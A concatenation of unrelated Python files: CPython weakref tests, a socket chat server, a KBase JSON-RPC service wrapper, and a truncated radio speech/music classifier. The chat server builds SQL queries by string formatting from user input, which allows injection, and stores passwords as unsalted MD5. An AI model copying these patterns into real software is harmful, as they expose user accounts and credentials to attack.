d[k] = v
del k
del v
t_copy = threading.Thread(target=dict_copy, args=(d, exc,))
if type_ is weakref.WeakKeyDictionary:
t_collect = threading.Thread(target=pop_and_collect, args=(keys,))
else: # weakref.WeakValueDictionary
t_collect = threading.Thread(target=pop_and_collect, args=(values,))
t_copy.start()
t_collect.start()
t_copy.join()
t_collect.join()
# Test exceptions
if exc:
raise exc[0]
def test_threaded_weak_key_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, False)
def test_threaded_weak_key_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, True)
def test_threaded_weak_value_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, False)
def test_threaded_weak_value_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, True)
@support.cpython_only
def test_remove_closure(self):
d = weakref.WeakValueDictionary()
self.assertIsNone(d._remove.__closure__)
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakValueDictionary conforms to the mapping protocol"""
__ref = {"key1":Object(1), "key2":Object(2), "key3":Object(3)}
type2test = weakref.WeakValueDictionary
def _reference(self):
return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakKeyDictionary conforms to the mapping protocol"""
__ref = {Object("key1"):1, Object("key2"):2, Object("key3"):3}
type2test = weakref.WeakKeyDictionary
def _reference(self):
return self.__ref.copy()
class FinalizeTestCase(unittest.TestCase):
class A:
pass
def _collect_if_necessary(self):
# we create no ref-cycles so in CPython no gc should be needed
if sys.implementation.name != 'cpython':
support.gc_collect()
def test_finalize(self):
def add(x,y,z):
res.append(x + y + z)
return x + y + z
a = self.A()
res = []
f = weakref.finalize(a, add, 67, 43, z=89)
self.assertEqual(f.alive, True)
self.assertEqual(f.peek(), (a, add, (67,43), {'z':89}))
self.assertEqual(f(), 199)
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
res = []
f = weakref.finalize(a, add, 67, 43, 89)
self.assertEqual(f.peek(), (a, add, (67,43,89), {}))
self.assertEqual(f.detach(), (a, add, (67,43,89), {}))
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [])
res = []
f = weakref.finalize(a, add, x=67, y=43, z=89)
del a
self._collect_if_necessary()
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
def test_arg_errors(self):
def fin(*args, **kwargs):
res.append((args, kwargs))
a = self.A()
res = []
f = weakref.finalize(a, fin, 1, 2, func=3, obj=4)
self.assertEqual(f.peek(), (a, fin, (1, 2), {'func': 3, 'obj': 4}))
f()
self.assertEqual(res, [((1, 2), {'func': 3, 'obj': 4})])
with self.assertRaises(TypeError):
weakref.finalize(a, func=fin, arg=1)
with self.assertRaises(TypeError):
weakref.finalize(obj=a, func=fin, arg=1)
self.assertRaises(TypeError, weakref.finalize, a)
self.assertRaises(TypeError, weakref.finalize)
def test_order(self):
a = self.A()
res = []
f1 = weakref.finalize(a, res.append, 'f1')
f2 = weakref.finalize(a, res.append, 'f2')
f3 = weakref.finalize(a, res.append, 'f3')
f4 = weakref.finalize(a, res.append, 'f4')
f5 = weakref.finalize(a, res.append, 'f5')
# make sure finalizers can keep themselves alive
del f1, f4
self.assertTrue(f2.alive)
self.assertTrue(f3.alive)
self.assertTrue(f5.alive)
self.assertTrue(f5.detach())
self.assertFalse(f5.alive)
f5() # nothing because previously unregistered
res.append('A')
f3() # => res.append('f3')
self.assertFalse(f3.alive)
res.append('B')
f3() # nothing because previously called
res.append('C')
del a
self._collect_if_necessary()
# => res.append('f4')
# => res.append('f2')
# => res.append('f1')
self.assertFalse(f2.alive)
res.append('D')
f2() # nothing because previously called by gc
expected = ['A', 'f3', 'B', 'C', 'f4', 'f2', 'f1', 'D']
self.assertEqual(res, expected)
def test_all_freed(self):
# we want a weakrefable subclass of weakref.finalize
class MyFinalizer(weakref.finalize):
pass
a = self.A()
res = []
def callback():
res.append(123)
f = MyFinalizer(a, callback)
wr_callback = weakref.ref(callback)
wr_f = weakref.ref(f)
del callback, f
self.assertIsNotNone(wr_callback())
self.assertIsNotNone(wr_f())
del a
self._collect_if_necessary()
self.assertIsNone(wr_callback())
self.assertIsNone(wr_f())
self.assertEqual(res, [123])
@classmethod
def run_in_child(cls):
def error():
# Create an atexit finalizer from inside a finalizer called
# at exit. This should be the next to be run.
g1 = weakref.finalize(cls, print, 'g1')
print('f3 error')
1/0
# cls should stay alive till atexit callbacks run
f1 = weakref.finalize(cls, print, 'f1', _global_var)
f2 = weakref.finalize(cls, print, 'f2', _global_var)
f3 = weakref.finalize(cls, error)
f4 = weakref.finalize(cls, print, 'f4', _global_var)
assert f1.atexit == True
f2.atexit = False
assert f3.atexit == True
assert f4.atexit == True
def test_atexit(self):
prog = ('from test.test_weakref import FinalizeTestCase;'+
'FinalizeTestCase.run_in_child()')
rc, out, err = script_helper.assert_python_ok('-c', prog)
out = out.decode('ascii').splitlines()
self.assertEqual(out, ['f4 foobar', 'f3 error', 'g1', 'f1 foobar'])
self.assertTrue(b'ZeroDivisionError' in err)
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weak referencable
>>> r = weakref.ref(obj)
>>> print(r() is obj)
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> print(r())
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super().__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.items():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super().__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> try:
... id2obj(a_id)
... except KeyError:
... print('OK')
... else:
... print('WeakValueDictionary error')
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
support.run_unittest(
ReferencesTestCase,
WeakMethodTestCase,
MappingTestCase,
WeakValueDictionaryTestCase,
WeakKeyDictionaryTestCase,
SubclassableWeakrefTestCase,
FinalizeTestCase,
)
support.run_doctest(sys.modules[__name__])
if __name__ == "__main__":
test_main()
|
Server.py
|
# coding=utf-8
from socket import *
import threading
import sqlite3
import hashlib
import struct
class Server(object):
"""
1.register
2.login
3.logout
4.Get the current list of all online users
5.Group messaging to all online users
6.Private message to specified user
7.Without GUI, it can run in Command Line mode
"""
def __init__(self):
self.HOST = ""
self.PORT = 52517
self.ADDR = (self.HOST, self.PORT)
self.linklist = []
self.dick = {}
server = socket(AF_INET, SOCK_STREAM)
server.bind(self.ADDR)
server.listen(1024)
self.create_sql()
print('waiting for connection')
while True:
client, addr = server.accept()
self.linklist.append(client)
data = 'welcome'
self.send(client, data)
print(addr, 'connected')
t = threading.Thread(target=self.tcplink, args=(client, addr))
t.start()
server.close()
def send(self, client, data):
"""
对发送信息进行包装,解决粘包问题
向客户端先发送头,在发送信息
:param client:
:param data: <str> or <byte>
:return:
"""
if isinstance(data, str):
data = data.encode()
header = struct.pack('i', len(data))
client.send(header)
client.send(data)
def tcplink(self, client, addr):
"""
a new tcp link
:param client:
:param addr:
:return:
"""
while True:
try:
recvheader = client.recv(4)
size = struct.unpack('i', recvheader)[0]
recv_size = 0
recvdata = b''
while recv_size < size:
data = client.recv(1024)
recvdata += data
recv_size += len(data)
recvdata = recvdata.decode()
print(addr, ':', recvdata)
datas = recvdata.split()
if datas[0] == "/r":
self.register(client, datas)
elif datas[0] == "/login":
self.Log_in(client, datas)
elif datas[0] == "/logout":
self.Log_out(client)
elif datas[0] == "/showall":
self.showall(client)
elif datas[0] == "/all":
self.Mass_msg(recvdata)
elif datas[0] == "/msg":
self.talk(client, recvdata)
elif datas[0] == "/exit":
for k, v in self.dick.items():
if v == client:
del self.dick[k]
self.linklist.remove(client)
client.close()
print(addr + 'closed')
break
else:
data = 'Instruction error'
self.send(client, data)
# client.send('Instruction error'.encode())
except ConnectionResetError:
return
def create_sql(self):
"""
创建储存已注册信息的数据库
:return:
"""
conn = sqlite3.connect("user_data.db")
cur = conn.cursor()
cur.execute(
"""create table if not exists
%s(
%s varchar(128) primary key,
%s varchar(128)
)"""
% ('user',
'account',
'password'))
conn.commit()
cur.close()
def register(self, client, datas):
"""
:param client:
:param datas:
:return:
"""
try:
account = datas[1]
password = str(datas[2])
password2 = str(datas[3])
except BaseException:
data = 'order error'
self.send(client, data)
# client.send('order error'.encode())
return
conn = sqlite3.connect("user_data.db")
cur = conn.cursor()
data = cur.execute(
"select * from user where account='%s'" %
account).fetchone()
print(data)
if not data:
if password == password2:
# 密码最好加密,不要储存明文密码
pwd = self.encryption(password)
cur.execute("insert into user values('%s','%s')"
% (account, str(pwd)))
conn.commit()
data = 'Successful'
self.send(client, data)
# client.send('Successful'.encode())
else:
data = 'Two Password Inconsistencies'
self.send(client, data)
# client.send('Two Password Inconsistencies'.encode())
else:
data = 'User Existing'
self.send(client, data)
# client.send("User Existing".encode())
cur.close()
def Log_in(self, client, datas):
"""
登录
:param client:
:param datas:
:return:
"""
try:
account = datas[1]
password = str(datas[2])
password2 = self.getpassword(account)
password = self.encryption(password)
except BaseException:
data = 'order error'
self.send(client, data)
# client.send('order error'.encode())
return
if password2 is not None:
if password == password2:
self.dick[account] = client
data = 'Successful'
self.send(client, data)
# client.send('Successful'.encode())
else:
data = 'Password error'
self.send(client, data)
# client.send('Password error'.encode())
else:
data = 'No account exists'
self.send(client, data)
# client.send('No account exists'.encode())
def Log_out(self, client):
"""
登出
:param client:
:return:
"""
for k, v in self.dick.items():
if v == client:
del self.dick[k]
break
data = 'Offline Success'
self.send(client, data)
# client.send("Offline Success".encode())
def getpassword(self, account):
"""
:param account:
:return:
"""
conn = sqlite3.connect('user_data.db')
cur = conn.cursor()
data = cur.execute(
"select password from user where account='%s'" %
account).fetchone()
print(data)
conn.commit()
cur.close()
if data is None:
return data
return data[0]
def showall(self, client):
"""
显示当前在线用户
:param client:
:return:
"""
for user in self.dick.keys():
self.send(client, user)
# client.send(user.encode())
def Mass_msg(self, data):
"""
向在线的所有人发消息
:param data:
:return:
"""
datas = data.split(" ", 1)
for client in self.dick.values():
try:
self.send(client, datas[1])
# client.send(datas[1].encode())
except BaseException:
data = 'order error'
self.send(client, data)
# client.send('order error'.encode())
return
def talk(self, client, data):
"""
向指定的人发送消息
:param data:
:return:
"""
try:
datas = data.split(" ", 2)
sb = datas[1]
msg = datas[2]
except BaseException:
data = 'order error'
self.send(client, data)
# client.send('order error'.encode())
return
for k, v in self.dick.items():
if v == client:
account = k
break
try:
message = account + ":" + msg
client1 = self.dick.get(sb)
self.send(client1, message)
# self.dick.get(sb).send(message.encode())
except BaseException:
data = '目标不在线'
self.send(client, data)
def encryption(self, password):
"""
加密密码
:param password: enable password
:return: Ciphertext password
"""
h = hashlib.md5()
h.update(password.encode())
return h.hexdigest()
if __name__ == '__main__':
server = Server()
|
VariationReportServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from VariationReport.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'VariationReport'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from VariationReport.VariationReportImpl import VariationReport # noqa @IgnorePep8
impl_VariationReport = VariationReport(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'VariationReport'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_VariationReport.run_VariationReport,
name='VariationReport.run_VariationReport',
types=[dict])
self.method_authentication['VariationReport.run_VariationReport'] = 'required' # noqa
self.rpc_service.add(impl_VariationReport.status,
name='VariationReport.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'VariationReport ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
Main.py
|
# Copyright (c) 2019 Max Graf
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import threading
import time
from pathlib import Path
import math
import numpy as np
from pygame import mixer
import AudioConverter as ac
import Output
import Processing
import radiorec
import util
from features import MFCC, CFA
# CFA threshold
cfa_threshold = 3.25
def decide(results):
"""
Takes the list of results as input and makes a final decision
:param results: The list of results. Comprised of the MFCC and CFA values
:return: A floating point number. If < 0.5 the currently observed chunks is classified as speech, else it is
classified as music
"""
mfcc = results["mfcc"][0] if "mfcc" in results else 0
cfa_result = results["cfa"] if "cfa" in results else 0
divisor = 2 if "mfcc" in results and "cfa" in results else 1
bias = 0
# Add bias
if mfcc > 0.5:
bias += 0.2
final_result = (mfcc + cfa_result) / divisor + bias
return final_result
def calc_from_stream(station, clf_mfcc, scaler_mfcc, is_mfcc, is_cfa, listening_preference, replacement_path):
"""
Streams 0.5 seconds of audio and classifies the data.
:param station: The radio station from which the data should be streamed. See "radiorec_settings.ini" for available stations.
:param clf_mfcc: The trained neural network classifier for MFCC classification
:param scaler_mfcc: The scaler instance used to scaled the original MFCC training data
:param is_mfcc: If the MFCC value should be calculated and taken into consideration for the final result
:param is_cfa: If the CFA value should be calculated and taken into consideration for the final result
:param listening_preference: The listening preference specifies whether spoken segments or music segments should be kept
:param replacement_path: The path to the audio file that is played when the unwanted class is detected
:return: void
"""
mixer.init(frequency=16000, channels=1)
succ_speech = 0
succ_music = 0
# Flag for checking if currently playing replacement
is_replacement = False
i = 0
while True:
results = {}
current_file = "stream_" + str(i)
radiorec.record(station, 0.5, current_file)
path = "data/test/" + current_file + ".mp3"
wav_path = ac.mp3_to_16_khz_wav(path)
print("Current: " + current_file)
# Preprocess audio
sig, rate, frequencies, times, spectrogram = Processing.preprocessing(wav_path)
# Take time
start = time.time()
# Use features specified in command line arguments
if is_mfcc:
# MFCC classification
current_mfcc = MFCC.read_mfcc(sig, rate)
result_mfcc = [-1]
thread_mfcc = threading.Thread(
target=Output.print_mfcc(current_mfcc, clf_mfcc, scaler_mfcc, result_mfcc, 9), args=(10,))
if is_cfa:
# CFA classification
cfa, peakis = CFA.calculate_cfa(spec=spectrogram, threshold=cfa_threshold)
result = round(cfa, 4)
results["cfa"] = result
print("CFA Music: " + str(result))
if is_mfcc:
thread_mfcc.start()
if is_mfcc:
thread_mfcc.join()
